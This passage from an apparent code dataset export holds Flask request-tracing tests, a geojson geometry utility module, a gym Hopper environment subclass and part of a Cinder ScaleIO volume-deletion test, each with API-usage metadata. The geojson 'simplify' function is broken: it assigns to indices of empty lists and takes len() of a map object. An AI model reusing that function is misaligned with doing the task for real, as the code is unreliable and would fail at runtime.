self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error'))\n self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)\n\n def test_request_501(self):\n \"\"\"\n When making a request\n When the requested endpoint calls `abort(501)`\n We create the expected spans\n \"\"\"\n @self.app.route('/501')\n def fivehundredone():\n abort(501)\n\n res = self.client.get('/501')\n self.assertEqual(res.status_code, 501)\n\n spans = self.get_spans()\n self.assertEqual(len(spans), 10)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.fivehundredone',\n 'flask.handle_user_exception',\n 'flask.handle_http_exception',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /501')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 1)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/501')\n assert_span_http_status_code(req_span, 501)\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundredone')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/501')\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('501 Not Implemented'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented')\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundredone')\n self.assertEqual(handler_span.resource, '/501')\n self.assertEqual(handler_span.error, 1)\n self.assertTrue(handler_span.get_tag('error.msg').startswith('501 Not Implemented'))\n self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented')\n\n # User exception span\n user_ex_span = spans[5]\n self.assertEqual(user_ex_span.service, 'flask')\n self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')\n self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')\n self.assertEqual(user_ex_span.error, 0)\n\n def test_request_error_handler(self):\n \"\"\"\n When making a request\n When the requested endpoint raises an exception\n We create the expected spans\n \"\"\"\n @self.app.errorhandler(500)\n def error_handler(e):\n return 'Whoops', 500\n\n @self.app.route('/500')\n def fivehundred():\n raise Exception('500 error')\n\n res = self.client.get('/500')\n self.assertEqual(res.status_code, 500)\n self.assertEqual(res.data, b'Whoops')\n\n spans = self.get_spans()\n\n if flask_version >= (0, 12, 0):\n self.assertEqual(len(spans), 11)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.fivehundred',\n 'flask.handle_user_exception',\n 'flask.handle_exception',\n 'tests.contrib.flask.test_request.error_handler',\n 'flask.process_response',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n else:\n self.assertEqual(len(spans), 10)\n\n # Assert the order of the spans created\n self.assertListEqual(\n [\n 'flask.request',\n 'flask.try_trigger_before_first_request_functions',\n 'flask.preprocess_request',\n 'flask.dispatch_request',\n 'tests.contrib.flask.test_request.fivehundred',\n 'flask.handle_user_exception',\n 'flask.handle_exception',\n 'tests.contrib.flask.test_request.error_handler',\n 'flask.do_teardown_request',\n 'flask.do_teardown_appcontext',\n ],\n [s.name for s in spans],\n )\n\n # Assert span services\n for span in spans:\n self.assertEqual(span.service, 'flask')\n\n # Root request span\n req_span = spans[0]\n self.assertEqual(req_span.service, 'flask')\n self.assertEqual(req_span.name, 'flask.request')\n self.assertEqual(req_span.resource, 'GET /500')\n self.assertEqual(req_span.span_type, 'web')\n self.assertEqual(req_span.error, 1)\n self.assertIsNone(req_span.parent_id)\n\n # Request tags\n self.assertEqual(req_span.get_tag('http.method'), 'GET')\n self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500')\n assert_span_http_status_code(req_span, 500)\n self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred')\n self.assertEqual(req_span.get_tag('flask.url_rule'), '/500')\n\n # Dispatch span\n dispatch_span = spans[3]\n self.assertEqual(dispatch_span.service, 'flask')\n self.assertEqual(dispatch_span.name, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')\n self.assertEqual(dispatch_span.error, 1)\n self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error'))\n self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name)\n\n # Handler span\n handler_span = spans[4]\n self.assertEqual(handler_span.service, 'flask')\n self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred')\n self.assertEqual(handler_span.resource, '/500')\n self.assertEqual(handler_span.error, 1)\n self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error'))\n self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(handler_span.get_tag('error.type'), base_exception_name)\n\n # User exception span\n user_ex_span = spans[5]\n self.assertEqual(user_ex_span.service, 'flask')\n self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')\n self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')\n self.assertEqual(user_ex_span.error, 1)\n self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error'))\n self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback'))\n self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)\n"},"apis":{"kind":"list like","value":["flask.abort"],"string":"[\n \"flask.abort\"\n]"},"extract_api":{"kind":"string","value":"[((16267, 16277), 'flask.abort', 'abort', (['(404)'], {}), '(404)\\n', (16272, 16277), False, 'from flask import abort\\n'), ((22922, 22932), 'flask.abort', 'abort', (['(501)'], {}), '(501)\\n', (22927, 22932), False, 'from flask import abort\\n')]"}}},{"rowIdx":763,"cells":{"code":{"kind":"string","value":"__doc__ = 'github: https://github.com/brandonxiang/geojson-python-utils'\nimport math\nfrom coordTransform_utils import wgs84togcj02\nfrom coordTransform_utils import gcj02tobd09\n\n\ndef linestrings_intersect(line1, line2):\n \"\"\"\n To valid whether linestrings from geojson are intersected with each other.\n reference: http://www.kevlindev.com/gui/math/intersection/Intersection.js\n\n Keyword arguments:\n line1 -- first line geojson object\n line2 -- second line geojson object\n\n if(line1 intersects with other) return intersect point array else empty array\n \"\"\"\n intersects = []\n for i in range(0, len(line1['coordinates']) - 1):\n for j in range(0, len(line2['coordinates']) - 1):\n a1_x = line1['coordinates'][i][1]\n a1_y = line1['coordinates'][i][0]\n a2_x = line1['coordinates'][i + 1][1]\n a2_y = line1['coordinates'][i + 1][0]\n b1_x = line2['coordinates'][j][1]\n b1_y = line2['coordinates'][j][0]\n b2_x = line2['coordinates'][j + 1][1]\n b2_y = line2['coordinates'][j + 1][0]\n ua_t = (b2_x - b1_x) * (a1_y - b1_y) - \\\n (b2_y - b1_y) * (a1_x - b1_x)\n ub_t = (a2_x - a1_x) * (a1_y - b1_y) - \\\n (a2_y - a1_y) * (a1_x - b1_x)\n u_b = (b2_y - b1_y) * (a2_x - a1_x) - (b2_x - b1_x) * (a2_y - a1_y)\n if not u_b == 0:\n u_a = ua_t / u_b\n u_b = ub_t / u_b\n if 0 <= u_a and u_a <= 1 and 0 <= u_b and u_b <= 1:\n intersects.append({'type': 'Point', 'coordinates': [\n a1_x + u_a * (a2_x - a1_x), a1_y + u_a * (a2_y - a1_y)]})\n # if len(intersects) == 0:\n # intersects = False\n return intersects\n\n\ndef _bbox_around_polycoords(coords):\n \"\"\"\n bounding box\n \"\"\"\n x_all = []\n y_all = []\n\n for first in coords[0]:\n x_all.append(first[1])\n y_all.append(first[0])\n\n return [min(x_all), min(y_all), max(x_all), max(y_all)]\n\n\ndef _point_in_bbox(point, bounds):\n \"\"\"\n valid whether the point is inside the bounding box\n \"\"\"\n return not(point['coordinates'][1] < bounds[0] or point['coordinates'][1] > bounds[2]\n or point['coordinates'][0] < bounds[1] or point['coordinates'][0] > bounds[3])\n\n\ndef _pnpoly(x, y, coords):\n \"\"\"\n the algorithm to judge whether the point is located in polygon\n reference: https://www.ecse.rpi.edu/~wrf/Research/Short_Notes/pnpoly.html#Explanation\n \"\"\"\n vert = [[0, 0]]\n\n for coord in coords:\n for node in coord:\n vert.append(node)\n vert.append(coord[0])\n vert.append([0, 0])\n\n inside = False\n\n i = 0\n j = len(vert) - 1\n\n while i < len(vert):\n if ((vert[i][0] > y) != (vert[j][0] > y)) and (x < (vert[j][1] - vert[i][1])\n * (y - vert[i][0]) / (vert[j][0] - vert[i][0]) + vert[i][1]):\n inside = not inside\n j = i\n i += 1\n\n return inside\n\n\ndef _point_in_polygon(point, coords):\n inside_box = False\n for coord in coords:\n if inside_box:\n break\n if _point_in_bbox(point, _bbox_around_polycoords(coord)):\n inside_box = True\n if not inside_box:\n return False\n\n inside_poly = False\n for coord in coords:\n if inside_poly:\n break\n if _pnpoly(point['coordinates'][1], point['coordinates'][0], coord):\n inside_poly = True\n return inside_poly\n\n\ndef point_in_polygon(point, poly):\n \"\"\"\n valid whether the point is located in a polygon\n\n Keyword arguments:\n point -- point geojson object\n poly -- polygon geojson object\n\n if(point inside poly) return true else false\n \"\"\"\n coords = [poly['coordinates']] if poly[\n 'type'] == 'Polygon' else poly['coordinates']\n return _point_in_polygon(point, coords)\n\n\ndef point_in_multipolygon(point, multipoly):\n \"\"\"\n valid whether the point is located in a mulitpolygon (donut polygon is not supported)\n\n Keyword arguments:\n point -- point geojson object\n multipoly -- multipolygon geojson object\n\n if(point inside multipoly) return true else false\n \"\"\"\n coords_array = [multipoly['coordinates']] if multipoly[\n 'type'] == \"MultiPolygon\" else multipoly['coordinates']\n\n for coords in coords_array:\n if _point_in_polygon(point, coords):\n return True\n\n return False\n\n\ndef number2radius(number):\n \"\"\"\n convert degree into radius\n\n Keyword arguments:\n number -- degree\n\n return radius\n \"\"\"\n return number * math.pi / 180\n\n\ndef number2degree(number):\n \"\"\"\n convert radius into degree\n\n Keyword arguments:\n number -- radius\n\n return degree\n \"\"\"\n return number * 180 / math.pi\n\n\ndef draw_circle(radius_in_meters, center_point, steps=15):\n \"\"\"\n get a circle shape polygon based on centerPoint and radius\n\n Keyword arguments:\n point1 -- point one geojson object\n point2 -- point two geojson object\n\n if(point inside multipoly) return true else false\n \"\"\"\n steps = steps if steps > 15 else 15\n center = [center_point['coordinates'][1], center_point['coordinates'][0]]\n dist = (radius_in_meters / 1000) / 6371\n # convert meters to radiant\n rad_center = [number2radius(center[0]), number2radius(center[1])]\n # 15 sided circle\n poly = []\n for step in range(0, steps):\n brng = 2 * math.pi * step / steps\n lat = math.asin(math.sin(rad_center[0]) * math.cos(dist) +\n math.cos(rad_center[0]) * math.sin(dist) * math.cos(brng))\n lng = rad_center[1] + math.atan2(math.sin(brng) * math.sin(dist)\n * math.cos(rad_center[0]), math.cos(dist) - math.sin(rad_center[0]) * math.sin(lat))\n poly.append([number2degree(lng), number2degree(lat)])\n return {\"type\": \"Polygon\", \"coordinates\": [poly]}\n\n\ndef rectangle_centroid(rectangle):\n \"\"\"\n get the centroid of the rectangle\n\n Keyword arguments:\n rectangle -- polygon geojson object\n\n return centroid\n \"\"\"\n bbox = rectangle['coordinates'][0]\n xmin = bbox[0][0]\n ymin = bbox[0][1]\n xmax = bbox[2][0]\n ymax = bbox[2][1]\n xwidth = xmax - xmin\n ywidth = ymax - ymin\n return {'type': 'Point', 'coordinates': [xmin + xwidth / 2, ymin + ywidth / 2]}\n\n\ndef point_distance(point1, point2):\n \"\"\"\n calculate the distance between two point on the sphere like google map\n reference http://www.movable-type.co.uk/scripts/latlong.html\n\n Keyword arguments:\n point1 -- point one geojson object\n point2 -- point two geojson object\n\n if(point inside multipoly) return true else false\n \"\"\"\n lon1 = point1['coordinates'][0]\n lat1 = point1['coordinates'][1]\n lon2 = point2['coordinates'][0]\n lat2 = point2['coordinates'][1]\n deg_lat = number2radius(lat2 - lat1)\n deg_lon = number2radius(lon2 - lon1)\n a = math.pow(math.sin(deg_lat / 2), 2) + math.cos(number2radius(lat1)) * \\\n math.cos(number2radius(lat2)) * math.pow(math.sin(deg_lon / 2), 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n return (6371 * c) * 1000\n\n\ndef geometry_within_radius(geometry, center, radius):\n \"\"\"\n To valid whether point or linestring or polygon is inside a radius around a center\n\n Keyword arguments:\n geometry -- point/linstring/polygon geojson object\n center -- point geojson object\n radius -- radius\n\n if(geometry inside radius) return true else false\n \"\"\"\n if geometry['type'] == 'Point':\n return point_distance(geometry, center) <= radius\n elif geometry['type'] == 'LineString' or geometry['type'] == 'Polygon':\n point = {}\n # it's enough to check the exterior ring of the Polygon\n coordinates = geometry['coordinates'][0] if geometry['type'] == 'Polygon' else geometry['coordinates']\n\n for coordinate in coordinates:\n point['coordinates'] = coordinate\n if point_distance(point, center) > radius:\n return False\n return True\n\n\ndef area(poly):\n \"\"\"\n calculate the area of polygon\n\n Keyword arguments:\n poly -- polygon geojson object\n\n return polygon area\n \"\"\"\n poly_area = 0\n # TODO: polygon holes at coordinates[1]\n points = poly['coordinates'][0]\n j = len(points) - 1\n count = len(points)\n\n for i in range(0, count):\n p1_x = points[i][1]\n p1_y = points[i][0]\n p2_x = points[j][1]\n p2_y = points[j][0]\n\n poly_area += p1_x * p2_y\n poly_area -= p1_y * p2_x\n j = i\n\n poly_area /= 2\n return poly_area\n\n\ndef centroid(poly):\n \"\"\"\n get the centroid of polygon\n adapted from http://paulbourke.net/geometry/polyarea/javascript.txt\n\n Keyword arguments:\n poly -- polygon geojson object\n\n return polygon centroid\n \"\"\"\n f_total = 0\n x_total = 0\n y_total = 0\n # TODO: polygon holes at coordinates[1]\n points = poly['coordinates'][0]\n j = len(points) - 1\n count = len(points)\n\n for i in range(0, count):\n p1_x = points[i][1]\n p1_y = points[i][0]\n p2_x = points[j][1]\n p2_y = points[j][0]\n\n f_total = p1_x * p2_y - p2_x * p1_y\n x_total += (p1_x + p2_x) * f_total\n y_total += (p1_y + p2_y) * f_total\n j = i\n\n six_area = area(poly) * 6\n return {'type': 'Point', 'coordinates': [y_total / six_area, x_total / six_area]}\n\n\ndef destination_point(point, brng, dist):\n \"\"\"\n Calculate a destination Point base on a base point and a distance\n\n Keyword arguments:\n pt -- polygon geojson object\n brng -- an angle in degrees\n dist -- distance in Kilometer between destination and base point\n\n return destination point object\n\n \"\"\"\n dist = float(dist) / 6371 # convert dist to angular distance in radians\n brng = number2radius(brng)\n\n lon1 = number2radius(point['coordinates'][0])\n lat1 = number2radius(point['coordinates'][1])\n\n lat2 = math.asin(math.sin(lat1) * math.cos(dist) +\n math.cos(lat1) * math.sin(dist) * math.cos(brng))\n lon2 = lon1 + math.atan2(math.sin(brng) * math.sin(dist) *\n math.cos(lat1), math.cos(dist) - math.sin(lat1) * math.sin(lat2))\n lon2 = (lon2 + 3 * math.pi) % (2 * math.pi) - math.pi # normalise to -180 degree +180 degree\n\n return {'type': 'Point', 'coordinates': [number2degree(lon2), number2degree(lat2)]}\n\n\ndef simplify(source, kink=20):\n \"\"\"\n source[] array of geojson points\n kink\tin metres, kinks above this depth kept\n kink depth is the height of the triangle abc where a-b and b-c are two consecutive line segments\n \"\"\"\n source_coord = map(lambda o: {\"lng\": o.coordinates[0], \"lat\": o.coordinates[1]}, source)\n\n # count, n_stack, n_dest, start, end, i, sig;\n # dev_sqr, max_dev_sqr, band_sqr;\n # x12, y12, d12, x13, y13, d13, x23, y23, d23;\n F = (math.pi / 180.0) * 0.5\n index = [] # aray of indexes of source points to include in the reduced line\n sig_start = [] # indices of start & end of working section\n sig_end = []\n\n # check for simple cases\n count = len(source_coord)\n if count < 3:\n return source_coord # one or two points\n\n # more complex case. initialize stack\n\n band_sqr = kink * 360.0 / (2.0 * math.pi * 6378137.0) # Now in degrees\n band_sqr *= band_sqr\n n_dest = 0\n sig_start[0] = 0\n sig_end[0] = count - 1\n n_stack = 1\n\n # while the stack is not empty\n while n_stack > 0:\n # ... pop the top-most entries off the stacks\n start = sig_start[n_stack - 1]\n end = sig_end[n_stack - 1]\n n_stack -= 1\n\n if (end - start) > 1: #any intermediate points ?\n # ... yes, so find most deviant intermediate point to either side of line joining start & end points\n x12 = source[end][\"lng\"] - source[start][\"lng\"]\n y12 = source[end][\"lat\"] - source[start][\"lat\"]\n if math.fabs(x12) > 180.0:\n x12 = 360.0 - math.fabs(x12)\n x12 *= math.cos(F * (source[end][\"lat\"] + source[start][\"lat\"])) # use avg lat to reduce lng\n d12 = (x12 * x12) + (y12 * y12)\n\n i = start + 1\n sig = start\n max_dev_sqr = -1.0\n while i < end:\n x13 = source[i][\"lng\"] - source[start][\"lng\"]\n y13 = source[i][\"lat\"] - source[start][\"lat\"]\n if math.fabs(x13) > 180.0:\n x13 = 360.0 - math.fabs(x13)\n x13 *= math.cos(F * (source[i][\"lat\"] + source[start][\"lat\"]))\n d13 = (x13 * x13) + (y13 * y13)\n x23 = source[i][\"lng\"] - source[end][\"lng\"]\n y23 = source[i][\"lat\"] - source[end][\"lat\"]\n if math.fabs(x23) > 180.0:\n x23 = 360.0 - math.fabs(x23)\n x23 *= math.cos(F * (source[i][\"lat\"] + source[end][\"lat\"]))\n d23 = (x23 * x23) + (y23 * y23)\n\n if d13 >= (d12 + d23):\n dev_sqr = d23\n elif d23 >= (d12 + d13):\n dev_sqr = d13\n else:\n dev_sqr = (x13 * y12 - y13 * x12) * (x13 * y12 - y13 * x12) / d12 # solve triangle\n if dev_sqr > max_dev_sqr:\n sig = i\n max_dev_sqr = dev_sqr\n i += 1\n\n\n if max_dev_sqr < band_sqr: # is there a sig. intermediate point ?\n #... no, so transfer current start point\n index[n_dest] = start\n n_dest += 1\n else: # ... yes, so push two sub-sections on stack for further processing\n n_stack += 1\n sig_start[n_stack - 1] = sig\n sig_end[n_stack - 1] = end\n n_stack += 1\n sig_start[n_stack - 1] = start\n sig_end[n_stack - 1] = sig\n\n else: # ... no intermediate points, so transfer current start point\n index[n_dest] = start\n n_dest += 1\n\n # transfer last point\n index[n_dest] = count - 1\n n_dest += 1\n\n # make return array\n r = []\n for i in range(0, n_dest):\n r.append(source_coord[index[i]])\n\n return map(lambda o: {\"type\": \"Point\",\"coordinates\": [o.lng, o.lat]}, r)\n\ndef wgs2gcj(geometry):\n \"\"\"\n convert wgs84 to gcj\n referencing by https://github.com/wandergis/coordTransform_py\n \"\"\"\n # TODO: point linestring point\n if geometry['type'] == 'MultiLineString':\n coordinates = geometry['coordinates']\n for lines in coordinates:\n for line in lines:\n line[0], line[1] = wgs84togcj02(line[0], line[1])\n\n return geometry\n\ndef gcj2bd(geometry):\n \"\"\"\n convert gcj to bd\n referencing by https://github.com/wandergis/coordTransform_py\n \"\"\"\n # TODO: point linestring point\n if geometry['type'] == 'MultiLineString':\n coordinates = geometry['coordinates']\n for lines in coordinates:\n for line in lines:\n line[0], line[1] = gcj02tobd09(line[0], line[1])\n\n return geometry\n\n"},"apis":{"kind":"list like","value":["coordTransform_utils.gcj02tobd09","math.sqrt","coordTransform_utils.wgs84togcj02","math.cos","math.fabs","math.sin"],"string":"[\n \"coordTransform_utils.gcj02tobd09\",\n \"math.sqrt\",\n \"coordTransform_utils.wgs84togcj02\",\n \"math.cos\",\n \"math.fabs\",\n \"math.sin\"\n]"},"extract_api":{"kind":"string","value":"[((7021, 7042), 'math.sin', 'math.sin', (['(deg_lat / 2)'], {}), '(deg_lat / 2)\\n', (7029, 7042), False, 'import math\\n'), ((7181, 7193), 'math.sqrt', 'math.sqrt', (['a'], {}), '(a)\\n', (7190, 7193), False, 'import math\\n'), ((7195, 7211), 'math.sqrt', 'math.sqrt', (['(1 - a)'], {}), '(1 - a)\\n', (7204, 7211), False, 'import math\\n'), ((12146, 12203), 'math.cos', 'math.cos', ([\"(F * (source[end]['lat'] + source[start]['lat']))\"], {}), \"(F * (source[end]['lat'] + source[start]['lat']))\\n\", (12154, 12203), False, 'import math\\n'), ((7132, 7153), 'math.sin', 'math.sin', (['(deg_lon / 2)'], {}), '(deg_lon / 2)\\n', (7140, 7153), False, 'import math\\n'), ((10081, 10095), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\\n', (10089, 10095), False, 'import math\\n'), ((10098, 10112), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\\n', (10106, 10112), False, 'import math\\n'), ((10170, 10184), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\\n', (10178, 10184), False, 'import math\\n'), ((10278, 10292), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\\n', (10286, 10292), False, 'import math\\n'), ((10294, 10308), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\\n', (10302, 10308), False, 'import math\\n'), ((12058, 12072), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\\n', (12067, 12072), False, 'import math\\n'), ((12624, 12679), 'math.cos', 'math.cos', ([\"(F * (source[i]['lat'] + source[start]['lat']))\"], {}), \"(F * (source[i]['lat'] + source[start]['lat']))\\n\", (12632, 12679), False, 'import math\\n'), ((12963, 13016), 'math.cos', 'math.cos', ([\"(F * (source[i]['lat'] + source[end]['lat']))\"], {}), \"(F * (source[i]['lat'] + source[end]['lat']))\\n\", (12971, 13016), False, 'import math\\n'), ((14749, 14779), 'coordTransform_utils.wgs84togcj02', 'wgs84togcj02', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\\n', (14761, 14779), False, 'from coordTransform_utils import wgs84togcj02\\n'), ((15155, 15184), 'coordTransform_utils.gcj02tobd09', 'gcj02tobd09', (['line[0]', 'line[1]'], {}), '(line[0], line[1])\\n', (15166, 15184), False, 'from coordTransform_utils import gcj02tobd09\\n'), ((5546, 5569), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\\n', (5554, 5569), False, 'import math\\n'), ((5572, 5586), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\\n', (5580, 5586), False, 'import math\\n'), ((5656, 5670), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\\n', (5664, 5670), False, 'import math\\n'), ((5788, 5811), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\\n', (5796, 5811), False, 'import math\\n'), ((5813, 5827), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\\n', (5821, 5827), False, 'import math\\n'), ((10136, 10150), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\\n', (10144, 10150), False, 'import math\\n'), ((10153, 10167), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\\n', (10161, 10167), False, 'import math\\n'), ((10215, 10229), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\\n', (10223, 10229), False, 'import math\\n'), ((10232, 10246), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\\n', (10240, 10246), False, 'import math\\n'), ((10311, 10325), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\\n', (10319, 10325), False, 'import math\\n'), ((10328, 10342), 'math.sin', 'math.sin', (['lat2'], {}), '(lat2)\\n', (10336, 10342), False, 'import math\\n'), ((12112, 12126), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\\n', (12121, 12126), False, 'import math\\n'), ((12528, 12542), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\\n', (12537, 12542), False, 'import math\\n'), ((12867, 12881), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\\n', (12876, 12881), False, 'import math\\n'), ((5613, 5636), 'math.cos', 'math.cos', (['rad_center[0]'], {}), '(rad_center[0])\\n', (5621, 5636), False, 'import math\\n'), ((5639, 5653), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\\n', (5647, 5653), False, 'import math\\n'), ((5713, 5727), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\\n', (5721, 5727), False, 'import math\\n'), ((5730, 5744), 'math.sin', 'math.sin', (['dist'], {}), '(dist)\\n', (5738, 5744), False, 'import math\\n'), ((5830, 5853), 'math.sin', 'math.sin', (['rad_center[0]'], {}), '(rad_center[0])\\n', (5838, 5853), False, 'import math\\n'), ((5856, 5869), 'math.sin', 'math.sin', (['lat'], {}), '(lat)\\n', (5864, 5869), False, 'import math\\n'), ((12586, 12600), 'math.fabs', 'math.fabs', (['x13'], {}), '(x13)\\n', (12595, 12600), False, 'import math\\n'), ((12925, 12939), 'math.fabs', 'math.fabs', (['x23'], {}), '(x23)\\n', (12934, 12939), False, 'import math\\n')]"}}},{"rowIdx":764,"cells":{"code":{"kind":"string","value":"import gym.envs.mujoco.hopper as hopper\nimport numpy as np\n\n\nclass HopperEnv(hopper.HopperEnv):\n def _get_obs(self):\n return np.concatenate([\n self.sim.data.qpos.flat[1:],\n self.sim.data.qvel.flat,\n ])\n\n def reset_obs(self, obs):\n state = np.insert(obs, 0, 0.)\n qpos = state[:self.model.nq]\n qvel = state[self.model.nq:]\n self.set_state(qpos, qvel)\n return self._get_obs()\n"},"apis":{"kind":"list like","value":["numpy.insert","numpy.concatenate"],"string":"[\n \"numpy.insert\",\n \"numpy.concatenate\"\n]"},"extract_api":{"kind":"string","value":"[((135, 205), 'numpy.concatenate', 'np.concatenate', (['[self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat]'], {}), '([self.sim.data.qpos.flat[1:], self.sim.data.qvel.flat])\\n', (149, 205), True, 'import numpy as np\\n'), ((288, 310), 'numpy.insert', 'np.insert', (['obs', '(0)', '(0.0)'], {}), '(obs, 0, 0.0)\\n', (297, 310), True, 'import numpy as np\\n')]"}}},{"rowIdx":765,"cells":{"code":{"kind":"string","value":"# Copyright (c) 2013 - 2015 EMC Corporation.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom six.moves import urllib\n\nfrom cinder import context\nfrom cinder import exception\nfrom cinder.tests.unit import fake_constants as fake\nfrom cinder.tests.unit import fake_volume\nfrom cinder.tests.unit.volume.drivers.emc import scaleio\nfrom cinder.tests.unit.volume.drivers.emc.scaleio import mocks\n\n\nclass TestDeleteVolume(scaleio.TestScaleIODriver):\n \"\"\"Test cases for ``ScaleIODriver.delete_volume()``\"\"\"\n def setUp(self):\n \"\"\"Setup a test case environment.\n\n Creates a fake volume object and sets up the required API responses.\n \"\"\"\n super(TestDeleteVolume, self).setUp()\n ctx = context.RequestContext('fake', 'fake', auth_token=True)\n\n self.volume = fake_volume.fake_volume_obj(\n ctx, **{'provider_id': fake.PROVIDER_ID})\n\n self.volume_name_2x_enc = urllib.parse.quote(\n urllib.parse.quote(self.driver._id_to_base64(self.volume.id))\n )\n\n self.HTTPS_MOCK_RESPONSES = {\n self.RESPONSE_MODE.Valid: {\n 'types/Volume/instances/getByName::' +\n self.volume_name_2x_enc: self.volume.id,\n 'instances/Volume::{}/action/removeMappedSdc'.format(\n self.volume.provider_id): self.volume.provider_id,\n 'instances/Volume::{}/action/removeVolume'.format(\n self.volume.provider_id\n ): self.volume.provider_id,\n },\n self.RESPONSE_MODE.BadStatus: {\n 'types/Volume/instances/getByName::' +\n self.volume_name_2x_enc: mocks.MockHTTPSResponse(\n {\n 'errorCode': 401,\n 'message': 'BadStatus Volume Test',\n }, 401\n ),\n 'instances/Volume::{}/action/removeVolume'.format(\n self.volume.provider_id\n ): mocks.MockHTTPSResponse(\n {\n 'errorCode': 401,\n 'message': 'BadStatus Volume Test',\n }, 401\n ),\n },\n }\n\n def test_bad_login_and_volume(self):\n self.set_https_response_mode(self.RESPONSE_MODE.BadStatus)\n self.assertRaises(exception.VolumeBackendAPIException,\n self.driver.delete_volume,\n self.volume)\n\n def test_delete_volume(self):\n \"\"\"Setting the unmap volume before delete flag for tests \"\"\"\n self.driver.configuration.set_override(\n 'sio_unmap_volume_before_deletion',\n override=True)\n self.driver.delete_volume(self.volume)\n"},"apis":{"kind":"list like","value":["cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse","cinder.tests.unit.fake_volume.fake_volume_obj","cinder.context.RequestContext"],"string":"[\n \"cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse\",\n \"cinder.tests.unit.fake_volume.fake_volume_obj\",\n \"cinder.context.RequestContext\"\n]"},"extract_api":{"kind":"string","value":"[((1268, 1323), 'cinder.context.RequestContext', 'context.RequestContext', (['\"\"\"fake\"\"\"', '\"\"\"fake\"\"\"'], {'auth_token': '(True)'}), \"('fake', 'fake', auth_token=True)\\n\", (1290, 1323), False, 'from cinder import context\\n'), ((1347, 